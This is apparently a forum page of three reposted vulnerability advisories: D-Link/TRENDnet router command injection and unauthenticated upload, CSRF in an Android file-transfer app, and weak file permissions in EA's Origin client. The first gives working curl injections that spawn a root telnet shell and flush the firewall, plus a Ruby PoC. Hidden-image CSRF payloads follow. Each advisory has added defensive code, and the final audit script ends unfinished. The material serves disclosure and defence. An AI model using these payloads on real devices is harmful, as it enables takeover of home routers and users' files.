Aerosol
Everything posted by Aerosol

  1. D-Link and TRENDnet 'ncc2' service - multiple vulnerabilities

Discovered by:
----
Peter Adkins <peter.adkins@kernelpicnic.net>

Access:
----
Local network; unauthenticated access.
Remote network; unauthenticated access*.
Remote network; 'drive-by' via CSRF.

Tracking and identifiers:
----
CVE - Mitre contacted; not yet allocated.

Platforms / Firmware confirmed affected:
----
D-Link DIR-820L (Rev A) - v1.02B10
D-Link DIR-820L (Rev A) - v1.05B03
D-Link DIR-820L (Rev - v2.01b02
TRENDnet TEW-731BR (Rev 2) - v2.01b01

Additional platforms believed to be affected:
----
D-Link DIR-808L (Rev A) - v1.03b05
D-Link DIR-810L (Rev A) - v1.01b04
D-Link DIR-810L (Rev - v2.02b01
D-Link DIR-826L (Rev A) - v1.00b23
D-Link DIR-830L (Rev A) - v1.00b07
D-Link DIR-836L (Rev A) - v1.01b03

Vendor involvement:
----
2015-01-11 - Issues reported to D-Link via email (security contact).
2015-01-11 - Issues reported to TRENDnet via support ticket.
2015-01-12 - Initial response from TRENDnet.
2015-01-14 - Initial response from D-Link (security contact).
2015-01-19 - Email to Mitre.
2015-01-19 - TRENDnet request a few days to validate vulnerabilities.
2015-01-26 - TRENDnet confirm vulnerabilities and commit to Feb 10 fix.
2015-02-01 - Initial response from Mitre.
2015-02-04 - Requested an update from D-Link (security contact).
2015-02-10 - TRENDnet release 2.02b01 resolving vulnerabilities.
2015-02-10 - Emailed Mitre requesting follow up.
2015-02-10 - Emailed D-Link requesting follow up (security contact).
2015-02-18 - Emailed D-Link requesting follow up (security contact).
2015-02-21 - Contacted D-Link support as I had still not heard back.
2015-02-22 - D-Link support were unsure as to my query.
2015-02-22 - Replied to D-Link support clarifying my request.
2015-02-23 - D-Link support directed me to the security reporting guide.
2015-02-26 - Vulnerability published to Bugtraq and GitHub.

Mitigation:
----
* Ensure remote / WAN management is disabled on the affected devices.
* Only allow trusted devices access to the local network.
* If using a listed TRENDnet device, install the patched firmware issued by the vendor.
* If using a listed D-Link device, you'll need to use a third party tool such as µBlock (Chrome, Firefox and Safari) to blacklist requests to your router. This isn't ideal, but it's better than the alternative.

Notes:
----
* Due to the nature of the 'ping.ccp' vulnerability, an attacker can gain root access, hijack DNS settings or execute arbitrary commands on these devices with the user simply visiting a web page with a malicious HTTP form embedded (via CSRF).
* Due to the location of this issue (ncc / ncc2) these vulnerabilities may be present in other devices and firmware versions not listed in this document.
* D-Link initially responded on their security contact within a week. However, after I had provided write ups of these vulnerabilities it went quiet. In over a month I have been unable to get any sort of response from D-Link, including as to whether they have managed to replicate these issues or when there will be a fix. I contacted D-Link support as a last ditch effort to reestablish contact, however I was linked back to the same security reporting process I had followed initially.
* Remote execution of these exploits is possible, but requires the device to already have remote / WAN management enabled; except in the case of 'ping.ccp', as above.
* If you have a D-Link device that is believed to be affected and can confirm whether the PoC is successful, please let me know and I will update the copy of this document on GitHub (see below) and provide credit for your findings.
* A copy of this document, as well as the proof of concept below and a more detailed write-up has been made available via GitHub:
* https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2

----
fwupgrade.ccp
----
The ncc / ncc2 service on the affected devices allows for basic firmware and language file upgrades via the web interface. During the operation, a HTTP POST is submitted to a resource named 'fwupgrade.ccp'. The request appears to be executed by the ncc / ncc2 service on the device, which runs as the root user.

Unfortunately, the filtering on this resource does not appear to be effective, as: file / MIME type filtering is not being performed; and the 'on-failure' redirection to the login page is being performed AFTER a file has already been written to the filesystem in full.

As a result of the above, this resource can be used to upload files to the filesystem of devices running vulnerable versions of ncc / ncc2 without authentication. This is also possible over the internet if WAN / remote management has been previously enabled on the device.

To compound the issue, at least in the case of the listed devices, files are written to a ramfs filesystem which is mounted at '/var/tmp'. This becomes an issue as this directory is also used to store volatile system configuration files - as the root filesystem is mounted read-only. The files under '/var/tmp' include 'resolv.conf', allowing for an attacker to hijack a user's DNS configuration:

    # Overwrite the DNS resolver with Google DNS
    echo 'nameserver 8.8.8.8' > resolv.conf
    curl \
        -i http://192.168.0.1/fwupgrade.ccp \
        -F action=fwupgrade \
        -F filename=resolv.conf \
        -F file=@resolv.conf

----
ping.ccp
----
The ncc / ncc2 service on the affected devices allows for basic 'ping' diagnostics to be performed via the 'ping.ccp' resource. Unfortunately, it appears that strings passed to this call are not correctly sanitized.

Much in the same manner as above, the request appears to be executed by the ncc / ncc2 service on the device, which is run as the root user.

The handler for 'ping_v4' does not appear to be vulnerable as this resource maps the components of an IPv4 address, represented by a dotted quad, into a format of '%u.%u.%u.%u' at execution time. However, 'ping_ipv6' references the user provided input directly as a string ('%s'), which is then passed to a system() call. This formatting allows for an attacker to pass arbitrary commands to the device through a HTTP request.

As this resource is also able to be accessed without authentication, it provides a vector for an attacker to execute arbitrary commands on the device - including, but not limited to, DNS hijacking and WAN firewall disablement - via CSRF.

    # Spawn a root shell (telnet)
    curl \
        -i http://192.168.0.1/ping.ccp \
        --data 'ccp_act=ping_v6&ping_addr=$(telnetd -l /bin/sh)'

    # Flush the iptables INPUT chain and set the default policy to ACCEPT.
    curl \
        -i http://192.168.0.1/ping.ccp \
        --data 'ccp_act=ping_v6&ping_addr=$(iptables -P INPUT ACCEPT)'
    curl \
        -i http://192.168.0.1/ping.ccp \
        --data 'ccp_act=ping_v6&ping_addr=$(iptables -F INPUT)'

----
UDPServer / MP Daemon
----
Note: This vulnerability does not seem to be present in firmware versions before 1.05B03 on the DIR-820LA1. This may differ on other platforms.

The ncc / ncc2 service on the affected devices appears to have been shipped with a number of diagnostic hooks available. Unfortunately, much in the same manner as the vulnerabilities discussed above, these hooks are able to be called without authentication. These hooks are also callable via CSRF; although a moot point given that the 'ping.ccp' vulnerability discussed above already yields a higher level of access to the device via the same manner.

One of the more 'interesting' hooks exposed by these devices allows for a 'UDPServer' process to be spawned on the device when called. When started this process listens on the device's LAN IP for data on UDP 9034. Unfortunately, this process does not appear to perform any sort of input sanitization before passing user input to a system() call.

Further investigation finds that the source for this service (UDPServer) is available in the RealTek SDK, and appears to be a diagnostic tool. As a result of the above, this process is vulnerable to arbitrary command injection.

    # Spawn a root shell (telnet)
    curl -i 192.168.0.1/test_mode.txt
    echo "\`telnetd -l /bin/sh\`" > /dev/udp/192.168.0.1/9034

----
Diagnostic hooks
----
Further to the 'test_mode' hook discussed above, the ncc / ncc2 service on the affected devices appears to have been shipped with a number of other diagnostic hooks enabled by default:

* tftpd_ready.txt
* chklst.txt
* wps_default_pin.txt
* usb_connect.txt
* wps_btn.txt
* reset_btn.txt
* reboot_btn.txt
* calibration_ready24G.txt
* calibration_ready5G.txt
* restore_default_finish.txt
* set_mac_finish.txt
* test_mode.txt
* wifist.txt

These resources do not exist on the filesystem of the device, nor do they appear to be static. Instead, these files appear to be rendered when queried and can be used to both interrogate the given device for information, as well as enable diagnostic services on demand.

Unfortunately, these hooks are able to be queried without any form of authentication, and are accessible by attackers on the local network, and over the internet via WAN management (if enabled), and CSRF.

Brief descriptions for each of these hooks are provided below. Those not listed provide either unknown functionality, or binary values which appear to represent system GPIO states (*_btn.txt).

- tftp_ready.txt
  When queried, this resource spawns a tftp daemon which has a root directory of '/'. As TFTP requires no authentication, this service can be used to extract credentials from the device or even download files from an external storage device connected via USB.

  Unfortunately, due to the way this data is stored on the system, all credentials appear to be available in plain-text. These credentials can include (depending on the vendor and device configuration):
  * GUI / Device management credentials
  * Samba credentials
  * PPPoE credentials
  * Email credentials
  * 'MyDlink' credentials (on D-Link devices)

- chklst.txt
  When queried, this resource will return the following information:
  * Current WLAN SSIDs
  * Current WLAN channels
  * LAN and WAN MAC addressing
  * Current Firmware version information
  * Hardware version information
  * Language information

- wps_default_pin.txt
  When queried, this resource will return the default / factory WPS pin for the device.

- usb_connect.txt
  When queried, this resource will return a binary value which indicates whether an external device is connected to the USB port on the device - or null in the case of devices that do not have an exposed USB port. This resource could potentially be used by an attacker to enumerate devices with USB storage attached.

----
Ruby PoC
----

    # NCC2 PoC.
    require 'pp'
    require 'optparse'
    require 'restclient'

    # Set defaults and parse command line arguments
    options = {}
    options[:addr] = "192.168.0.1"
    options[:port] = 80

    OptionParser.new do |option|
      option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
        options[:addr] = a
      end
      option.on("--port [PORT]", "Destination TCP port") do |p|
        options[:port] = p
      end
      option.parse!
    end

    # Define which SOAPActions we will be using.
    actions = [
      {
        :name => "Get device information",
        :call => "sloppy_parser",
        :path => "chklst.txt",
      },
      {
        :name => "Has USB device connected",
        :call => "txt_parser",
        :path => "usb_connect.txt",
      },
      {
        :name => "Get WPS default pin",
        :call => "txt_parser",
        :path => "wps_default_pin.txt",
      },
      {
        :name => "Enable UDPServer",
        :call => "noop",
        :path => "test_mode.txt",
      },
      {
        :name => "Enable TFTP service",
        :call => "noop",
        :path => "tftpd_ready.txt",
      },
      {
        :name => "Enable telnet (root)",
        :call => "noop",
        :path => "ping.ccp",
        :post => {
          "ccp_act"   => "ping_v6",
          "ping_addr" => "$(telnetd -l /bin/sh)"
        }
      }
    ]

    def noop(val)
      return
    end

    def sloppy_parser(slop)
      slop.split(/\<br \/\>/).each do |l|
        puts "  #{l}"
      end
    end

    def txt_parser(txt)
      l = txt.gsub(/\=/, ': ')
      puts "  #{l}"
    end

    # Iterate over all actions and attempt to execute.
    url = "http://#{options[:addr]}:#{options[:port]}"
    puts "[!] Attempting to extract information from #{url}"

    actions.each do |action|
      # Build the target URL and setup the HTTP client object.
      request = RestClient::Resource.new("#{url}/#{action[:path]}")

      # Fire the request and ensure a 200 OKAY.
      begin
        if action[:post]
          response = request.post(action[:post])
        else
          response = request.get()
        end
      rescue
        puts "[!] Failed to query remote host."
        abort
      end

      if response.code != 200
        puts "[-] '#{action[:name]}' failed with response: #{response.code}"
        next
      end

      # Send to the processor.
      puts "[*] #{action[:name]} request succeeded."
      send(action[:call], response.body())
    end

Source
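A defender-side check for the issues in this advisory, added here as an example (it is neither the advisory's code nor its PoC): it classifies captured router HTTP requests against the hook names, the 'ping.ccp' ping_v6 handler and the 'fwupgrade.ccp' upload described above. The request record layout, the LAN range and the sample records are constructed assumptions.

```python
"""Detection logic for the ncc/ncc2 exposures described in the advisory above.

Added example, not part of the advisory or its PoC. It scores captured HTTP
requests to a router (constructed sample records below) against the resources
the advisory names: the diagnostic hook files, 'ping.ccp' with 'ping_v6', and
the 'fwupgrade.ccp' upload. Record layout and LAN range are assumptions.
"""
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Diagnostic hook resources listed in the advisory; none should be reachable unauthenticated.
DIAGNOSTIC_HOOKS = {
    "tftpd_ready.txt", "chklst.txt", "wps_default_pin.txt", "usb_connect.txt",
    "wps_btn.txt", "reset_btn.txt", "reboot_btn.txt", "calibration_ready24G.txt",
    "calibration_ready5G.txt", "restore_default_finish.txt", "set_mac_finish.txt",
    "test_mode.txt", "wifist.txt",
}
# Volatile config files the advisory says live under /var/tmp on the device.
VOLATILE_CONFIG = {"resolv.conf"}
# Assumption: the router's LAN, matching the 192.168.0.1 address used in the advisory.
LAN = ipaddress.ip_network("192.168.0.0/24")


def is_ipv6_literal(value):
    """True only for a bare IPv6 address, the only thing 'ping_v6' should receive."""
    try:
        ipaddress.IPv6Address(value)
        return True
    except ValueError:
        return False


def first(params, key):
    """First value of a parse_qs parameter, or '' when absent."""
    return params.get(key, [""])[0]


def assess_request(req):
    """Return a list of finding strings for one request record.

    req: {"src": client IP, "method": "GET"/"POST", "path": "/x?y=z",
          "body": urlencoded form body or "", "upload_name": multipart filename or ""}
    """
    findings = []
    parts = urlsplit(req["path"])
    resource = parts.path.lstrip("/")
    params = parse_qs(parts.query)
    params.update(parse_qs(req.get("body", "")))

    if ipaddress.ip_address(req["src"]) not in LAN:
        findings.append("request from outside the LAN: WAN/remote management reachable")

    if resource in DIAGNOSTIC_HOOKS:
        findings.append("diagnostic hook queried: " + resource)

    # ping_v6 passes its argument to system(); anything but an address is an injection attempt.
    if resource == "ping.ccp" and first(params, "ccp_act") == "ping_v6":
        addr = first(params, "ping_addr")
        if not is_ipv6_literal(addr):
            findings.append("ping_v6 with non-address value %r: command injection attempt" % addr)

    # fwupgrade.ccp writes the file before the auth redirect, so every upload deserves a look.
    if resource == "fwupgrade.ccp" and req["method"] == "POST":
        name = req.get("upload_name", "")
        if name in VOLATILE_CONFIG:
            findings.append("fwupgrade.ccp upload named %s: config overwrite attempt" % name)
        else:
            findings.append("fwupgrade.ccp upload of %r: confirm it came from an admin session" % name)

    return findings


def scan(requests):
    """(index, findings) for every request that produced at least one finding."""
    return [(i, f) for i, f in enumerate(assess_request(r) for r in requests) if f]


SAMPLE_REQUESTS = [  # constructed records, not captured traffic
    {"src": "192.168.0.10", "method": "GET", "path": "/index.html", "body": ""},
    {"src": "192.168.0.10", "method": "POST", "path": "/ping.ccp",
     "body": "ccp_act=ping_v6&ping_addr=2001:db8::1"},
    {"src": "192.168.0.23", "method": "POST", "path": "/ping.ccp",
     "body": "ccp_act=ping_v6&ping_addr=$(id)"},
    {"src": "203.0.113.7", "method": "GET", "path": "/wps_default_pin.txt", "body": ""},
    {"src": "192.168.0.23", "method": "POST", "path": "/fwupgrade.ccp",
     "body": "action=fwupgrade", "upload_name": "resolv.conf"},
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_REQUESTS):
        print("request %d:" % idx)
        for finding in findings:
            print("  -", finding)
```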
  2. Document Title:
===============
Wireless File Transfer Pro Android - CSRF Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1437

Release Date:
=============
2015-02-25

Vulnerability Laboratory ID (VL-ID):
====================================
1437

Common Vulnerability Scoring System:
====================================
2.3

Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer.

(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple cross site request forgery web vulnerabilities in the Wireless File Transfer Pro v1.0.1 mobile android application.

Vulnerability Disclosure Timeline:
==================================
2015-02-25: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Lextel Technology
Product: Wireless File Transfer Pro - (Android) Web Application UI 5.9.5 - 1.0.1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
Multiple cross site request forgery issues have been discovered in the Wireless File Transfer Pro 1.0.1 android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.

Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers without privileged application user account and with medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Create New Folder

    <img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4
<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">

Delete File, Folder

    <img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30

Reference: http://localhost:8888/

Security Risk:
==============
The security risk of the cross site request forgery web vulnerability in the create and delete function is estimated as medium. (CVSS 2.3)

Credits & Authors:
==================
Hadji Samir [s-dz@hotmail.fr]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Source
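The request policy that would close the two CSRF holes above, added as an example (not the application's code): state-changing 'fileExplorer.html' actions are refused on GET and, on POST, need a session-bound token plus a matching Origin. The token scheme, header names, session id and sample requests are assumptions; the endpoint, action names and address come from the advisory.

```python
"""Request policy closing the CSRF holes described in the advisory above.

Added example, not the application's code. It models the 'fileExplorer.html'
actions the advisory shows (create, deleteFile, and the app's own 'brower' for
browsing) and decides whether a request may run them. The token scheme, header
names and the sample requests are assumptions.
"""
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit

STATE_CHANGING = {"create", "deleteFile"}  # actions the advisory forges via <img>
READ_ONLY = {"brower"}                     # the app's browse action, spelled as in its URLs
SERVER_ORIGIN = "http://192.168.1.2:8888"  # address used in the advisory's PoC


def csrf_token(session_id, secret):
    """Token bound to the session with an HMAC, so a third-party page cannot know it."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def authorize(req, secret):
    """Decide (allowed, reason) for one request.

    req: {"method": ..., "path": "/x?y=z", "headers": {...}, "body": urlencoded or "",
          "session_id": id of the authenticated app session (assumption)}
    """
    parts = urlsplit(req["path"])
    if parts.path != "/fileExplorer.html":
        return True, "not a file explorer request"
    params = parse_qs(parts.query)
    form = parse_qs(req.get("body", ""))
    action = (params.get("action") or form.get("action") or [""])[0]

    if action in READ_ONLY:
        return True, "read-only action"
    if action not in STATE_CHANGING:
        return False, "unknown action %r" % action
    # A GET fires from any page the victim visits (img, link): refuse it outright.
    if req["method"] != "POST":
        return False, "state-changing action %r refused on %s" % (action, req["method"])
    # Browsers attach Origin to cross-site POSTs, so a form on another site fails here.
    origin = req["headers"].get("Origin", "")
    if origin != SERVER_ORIGIN:
        return False, "Origin %r does not match the application" % origin
    # The token proves the form was rendered by the app for this session.
    supplied = (form.get("csrf_token") or [""])[0]
    if not hmac.compare_digest(csrf_token(req["session_id"], secret), supplied):
        return False, "missing or invalid CSRF token"
    return True, "authorized"


SECRET = b"constructed-demo-secret"  # a real deployment uses a random per-install secret
SESSION = "session-abc123"           # constructed session id

# Constructed samples: the advisory's forged GET, a forged cross-site POST, a legitimate POST.
FORGED_GET = {"method": "GET", "headers": {},
              "path": "/fileExplorer.html?action=create&type=folder&folderName=test1",
              "body": "", "session_id": SESSION}
FORGED_POST = {"method": "POST", "headers": {"Origin": "http://evil.example"},
               "path": "/fileExplorer.html", "body": "action=deleteFile&fileName=test",
               "session_id": SESSION}
LEGIT_POST = {"method": "POST", "headers": {"Origin": SERVER_ORIGIN},
              "path": "/fileExplorer.html",
              "body": "action=create&type=folder&folderName=test1&csrf_token="
                      + csrf_token(SESSION, SECRET),
              "session_id": SESSION}

if __name__ == "__main__":
    for name, req in [("forged GET", FORGED_GET), ("forged POST", FORGED_POST),
                      ("legit POST", LEGIT_POST)]:
        print(name, authorize(req, SECRET))
```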
  3. Electronic Arts Origin Client 9.5.5 Multiple Privilege Escalation Vulnerabilities

Vendor: Electronic Arts Inc.
Product web page: https://www.origin.com
Affected version: 9.5.5.2850 (353317)
                  9.5.3.636 (350385)
                  9.5.2.2829 (348065)

Summary: Origin (formerly EA Download Manager (EADM)) is digital distribution software from Electronic Arts that allows users to purchase games on the internet for PC and mobile platforms, and download them with the Origin client (formerly EA Download Manager, EA Downloader and EA Link).

Desc#1: The application is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exists due to the improper permissions, with the 'F' flag (full) for the 'Everyone' and 'Users' group, for the 'OriginClientService.exe' binary file, and for all the files in the 'Origin' directory. The service is installed by default to start on system boot with LocalSystem privileges. Attackers can replace the binary with their rootkit, and on reboot they get SYSTEM privileges.

Desc#2: Origin client service also suffers from an unquoted search path issue impacting the 'Origin Client Service' service for Windows deployed as part of the Origin Thin Setup bundle. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5231
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5231.php

14.12.2014

**************************************************************************

C:\>sc qc "Origin Client Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Origin Client Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Origin\OriginClientService.exe  <-----< Unquoted path
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Origin Client Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>cacls "C:\Program Files (x86)\Origin\OriginClientService.exe"
c:\Program Files (x86)\Origin\OriginClientService.exe Everyone:(ID)F  <-----< Full control
                                                      BUILTIN\Users:(ID)F  <-----< Full control
                                                      NT AUTHORITY\SYSTEM:(ID)F
                                                      BUILTIN\Administrators:(ID)F

C:\>

**************************************************************************

**************************************************************************

C:\>cscript XCACLS.vbs "C:\Program Files (x86)\Origin\*.exe"
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

Starting XCACLS.VBS (Version: 5.2) Script at 15.12.2014 19:46:41

Startup directory:
"C:\"

Arguments Used:
        Filename = "C:\Program Files (x86)\Origin\*.exe"
**************************************************************************
File: C:\Program Files (x86)\Origin\EAProxyInstaller.exe

Permissions:
Type     Username                Permissions     Inheritance

Allowed  \Everyone               Full Control    This Folder Only
Allowed  BUILTIN\Users           Full Control    This Folder Only
Allowed  NT AUTHORITY\SYSTEM     Full Control    This Folder Only
Allowed  BUILTIN\Administrators  Full Control    This Folder Only

No Auditing set

Owner: BUILTIN\Administrators

**************************************************************************
**************************************************************************
File: C:\Program Files (x86)\Origin\igoproxy64.exe

Permissions:
Type     Username                Permissions     Inheritance

Allowed  \Everyone               Full Control    This Folder Only
Allowed  BUILTIN\Users           Full Control    This Folder Only
Allowed  NT AUTHORITY\SYSTEM     Full Control    This Folder Only
Allowed  BUILTIN\Administrators  Full Control    This Folder Only

No Auditing set

Owner: BUILTIN\Administrators

**************************************************************************
**************************************************************************
File: C:\Program Files (x86)\Origin\Origin.exe

Permissions:
Type     Username                Permissions     Inheritance

Allowed  \Everyone               Full Control    This Folder Only
Allowed  BUILTIN\Users           Full Control    This Folder Only
Allowed  NT AUTHORITY\SYSTEM     Full Control    This Folder Only
Allowed  BUILTIN\Administrators  Full Control    This Folder Only

No Auditing set

Owner: BUILTIN\Administrators

**************************************************************************
**************************************************************************
File: C:\Program Files (x86)\Origin\OriginClientService.exe

Permissions:
Type     Username                Permissions     Inheritance

Allowed  \Everyone               Full Control    This Folder Only
Allowed  BUILTIN\Users           Full Control    This Folder Only
Allowed  NT AUTHORITY\SYSTEM     Full Control    This Folder Only
Allowed  BUILTIN\Administrators  Full Control    This Folder Only

No Auditing set

Owner: BUILTIN\Administrators

**************************************************************************
**************************************************************************
File: C:\Program Files (x86)\Origin\OriginCrashReporter.exe

Permissions:
Type     Username                Permissions     Inheritance

Allowed  \Everyone               Full Control    This Folder Only
Allowed  BUILTIN\Users           Full Control    This Folder Only
Allowed  NT AUTHORITY\SYSTEM     Full Control    This Folder Only
Allowed  BUILTIN\Administrators  Full Control    This Folder Only

No Auditing set

Owner: BUILTIN\Administrators

**************************************************************************
**************************************************************************
File: C:\Program Files (x86)\Origin\OriginER.exe

Permissions:
Type     Username                Permissions     Inheritance

Allowed  \Everyone               Full Control    This Folder Only
Allowed  BUILTIN\Users           Full Control    This Folder Only
Allowed  NT AUTHORITY\SYSTEM     Full Control    This Folder Only
Allowed  BUILTIN\Administrators  Full Control    This Folder Only

No Auditing set

Owner: BUILTIN\Administrators

**************************************************************************
**************************************************************************
File: C:\Program Files (x86)\Origin\OriginUninstall.exe

Permissions:
Type     Username                Permissions     Inheritance

Allowed  \Everyone               Full Control    This Folder Only
Allowed  BUILTIN\Users           Full Control    This Folder Only
Allowed  NT AUTHORITY\SYSTEM     Full Control    This Folder Only
Allowed  BUILTIN\Administrators  Full Control    This Folder Only

No Auditing set

Owner: BUILTIN\Administrators

**************************************************************************

Operation Complete
Elapsed Time: 0,1796875 seconds.

Ending Script at 15.12.2014 19:46:41

C:\>

**************************************************************************

--

**************************************************************************

Changed permissions and service binary path name (vendor fix):
--------------------------------------------------------------

C:\>sc qc "Origin Client Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Origin Client Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Origin\OriginClientService.exe"  <-----< Quoted path
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Origin Client Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>icacls "C:\Program Files (x86)\Origin\OriginClientService.exe"
C:\Program Files (x86)\Origin\OriginClientService.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                      BUILTIN\Administrators:(I)(F)
                                                      BUILTIN\Users:(I)(RX)  <-----< Read and execute

Successfully processed 1 files; Failed processing 0 files

C:\>

**************************************************************************

Source
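An audit for the two conditions this advisory reports, added as an example (not the advisory's or the vendor's code): it flags an unquoted BINARY_PATH_NAME with spaces and any cacls/icacls entry that gives a low-privileged group write-class access, working on captured command output so it runs on any platform. The sample texts are constructed from the advisory's own 'sc qc', 'cacls' and 'icacls' listings; the set of low-privileged groups is an assumption.

```python
"""Audit helpers for the two Origin Client Service findings above.

Added example, not the advisory's or the vendor's code. It checks captured
'sc qc' output for an unquoted binary path and cacls/icacls output for ACEs that
let low-privileged groups replace the binary. Sample texts below are constructed
from the advisory's listings.
"""
import re

# Groups every interactive local user belongs to (assumption: default Windows groups).
LOW_PRIV_PRINCIPALS = {"everyone", "builtin\\users", "nt authority\\authenticated users"}
# cacls/icacls simple rights that let the holder replace or alter the file.
WRITE_RIGHTS = {"F", "M", "W", "C"}
# Inheritance markers that appear in parentheses but are not rights.
INHERIT_FLAGS = {"I", "ID", "OI", "CI", "IO", "NP"}


def unquoted_path_candidates(binary_path_name):
    """Files the service loader may try before the real binary when the path is
    unquoted and contains spaces; each is a hijack point if a low-privileged user
    can create it. A quoted or space-free path yields an empty list."""
    path = (binary_path_name or "").strip()
    if path.startswith('"') or " " not in path:
        return []
    parts = path.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    return candidates


def service_binary_path(sc_qc_output):
    """BINARY_PATH_NAME from 'sc qc' output, or None if the field is absent."""
    m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", sc_qc_output)
    return m.group(1).strip() if m else None


def parse_ace(line):
    """Parse one cacls/icacls ACE line into (principal, rights); None if not an ACE.
    The first ACE line also carries the file path, so text up to '.exe ' is dropped."""
    tail = re.split(r"\.exe\s+", line, maxsplit=1, flags=re.IGNORECASE)[-1].strip()
    who, sep, rest = tail.rpartition(":")
    if not sep or not who or not re.fullmatch(r"(?:\([^)]*\))*[A-Z,]*", rest):
        return None
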